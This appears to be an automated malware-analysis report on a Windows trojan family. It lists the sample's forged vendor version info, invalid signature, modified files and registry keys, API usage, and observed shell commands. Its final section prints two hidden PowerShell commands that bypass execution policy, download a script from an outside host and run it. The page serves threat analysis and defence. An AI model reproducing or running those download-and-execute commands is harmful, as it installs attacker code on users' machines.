
Trojan.Agent.OPA

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,467
Threat Level: 80 % (High)
Infected Computers: 349
First Seen: October 1, 2024
Last Seen: March 4, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.Agent.OPA
Signature status: No Signature

Known Samples


Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has exports table
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)


Windows PE Version Information

Name Value
Comments metapath
Company Name
  • Autodesk, Inc.
  • Epic Games, Inc.
  • Florian Balmer et al.
  • Guillemot R&D Inc.
  • Kensington
  • RF Helper - Loader
File Description
  • AutoCAD component
  • BootstrapPackagedGame
  • KTGLDR Service X64
  • metapath File Browser
  • Test Application for Thrustmaster API Library.
File Version
  • 25.1.122.0.0
  • 4.24.01.5098
  • 2.51.0.0
  • 2.32.0.0
  • 1.1.7.9
  • 1.0.0.3
Internal Name
  • KTGLDRSrv
  • metapath
  • tm_sdk_api_lib_testapp.exe
  • UnrealEngine
Legal Copyright
  • All rights reserved.
  • Copyright (C) 2017-2025
  • Copyright 2025 Autodesk, Inc. All rights reserved.
  • Fill out your copyright notice in the Description page of Project Settings.
  • rfhelper.net ® 2020 - 2024
  • © 1996-2024 Florian Balmer and all contributors
Original Filename
  • BootstrapPackagedGame-Win64-Shipping.exe
  • metapath.exe
  • tm_sdk_api_lib_testapp.exe
Product Name
  • AutoCAD
  • BootstrapPackagedGame
  • KTGLDR Service X64
  • metapath
  • RF Helper - Loader
Product Version
  • 25.1.122.0.0
  • 4.24.01.5098
  • 1.1.7.9
  • 1.0.0.0
  • 0.0.0.0
  • ++UE4+Release-4.26-CL-0

Digital Signatures

Signer: Autodesk, Inc.
Root: DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1
Status: Hash Mismatch

File Traits

  • fptable
  • HighEntropy
  • No Version Info
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 379
Potentially Malicious Blocks: 1
Whitelisted Blocks: 377
Unknown Blocks: 1


Similar Families

  • AddUser.XB
  • Agent.GFOA
  • Agent.GSDT
  • Agent.IFSC
  • Agent.LKS
  • Agent.LPQ
  • Agent.LPQA
  • Agent.OSR
  • Agent.PSA
  • Exploit.X
  • Farfli.RE
  • Gamehack.GACE
  • Havoc.L
  • Kryptik.DTGC
  • Kryptik.KPJ
  • Mimikatz.CWK
  • Pycoon.A
  • Rugmi.GJ
  • ShellcodeRunner.KSA
  • ShellcodeRunner.LZ
  • ShellcodeRunner.TX
  • Spy.Agent.KG
  • Trojan.Agent.Gen.AAQ
  • Trojan.Agent.Gen.ADD
  • Trojan.Agent.Gen.AGT
  • Trojan.Agent.Gen.AHJ
  • Trojan.Agent.Gen.AQG
  • Trojan.Agent.Gen.ATY
  • Trojan.Agent.Gen.CD
  • Trojan.Agent.Gen.DZ
  • Trojan.Agent.Gen.GQ
  • Trojan.Agent.Gen.IN
  • Trojan.Agent.Gen.IU
  • Trojan.Agent.Gen.OC
  • Trojan.Agent.Gen.TX
  • Trojan.Agent.Gen.UT
  • Trojan.Agent.Gen.VW
  • Trojan.Agent.Gen.YS
  • Trojan.Agent.Gen.ZQ
  • Trojan.Downloader.Gen.CQ
  • Trojan.Downloader.Gen.DI
  • Trojan.Downloader.Gen.EN
  • Trojan.Injector.Gen.FLW
  • Trojan.Kryptik.Gen.CYB
  • Trojan.ShellcodeRunner.Gen.BD
  • Trojan.ShellcodeRunner.Gen.BL
  • Trojan.ShellcodeRunner.Gen.FJ
  • Trojan.ShellcodeRunner.Gen.FS
  • Trojan.ShellcodeRunner.Gen.JU

Files Modified

File Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134136776547180413.7232.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134136776547336726.6472.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167075550148938.672.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167075550376978.7688.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_2ltv0sxq.r3m.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_34qyhnmg.tej.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_3wetjcdh.sxj.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4y5c4rh1.ukq.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_navh4xrt.jeh.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_nvy3qtyn.ulm.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_onogysay.dkc.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_y43zjyqs.0h0.ps1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKCU\software\thrustmaster\apibridge::maintenance RegNtPreCreateKey
HKCU\software\thrustmaster\apibridge::maintenance RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\mountpoints2\##10.200.31.10#amas::_labelfromdesktopini RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 瘴ի貰ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꤸ躹꠾ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 浰躾꠾ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeDirectoryFile
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryTimerResolution
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueueApcThread
  • ntdll.dll!NtQueueApcThreadEx2
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory

127 additional items are not displayed above.

Other Suspicious
  • AdjustTokenPrivileges
Service Control
  • StartServiceCtrlDispatcher
Process Shell Execute
  • CreateProcess
  • WinExec
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetComputerName
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
Encryption Used
  • BCryptOpenAlgorithmProvider
Network Winsock2
  • WSAConnect
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • closesocket
  • freeaddrinfo
  • getaddrinfo
  • recv
  • send
  • setsockopt
Network Winhttp
  • WinHttpOpen
Network Info Queried
  • GetAdaptersAddresses
  • GetNetworkParams

Shell Command Execution

c:\users\user\downloads\RED\Binaries\Win64\DRAGON_BALL_FighterZ.exe
powershell -Exec Bypass -NoProfile -WindowStyle Hidden -c "(New-Object Net.WebClient).DownloadString('http://atualizadoativado.com/0/0.ps1') | iex"
powershell -Exec Bypass -NoProfile -WindowStyle Hidden -c "(New-Object Net.WebClient).DownloadString('http://atualizadoativado.com/0/corel/0.ps1') | iex"
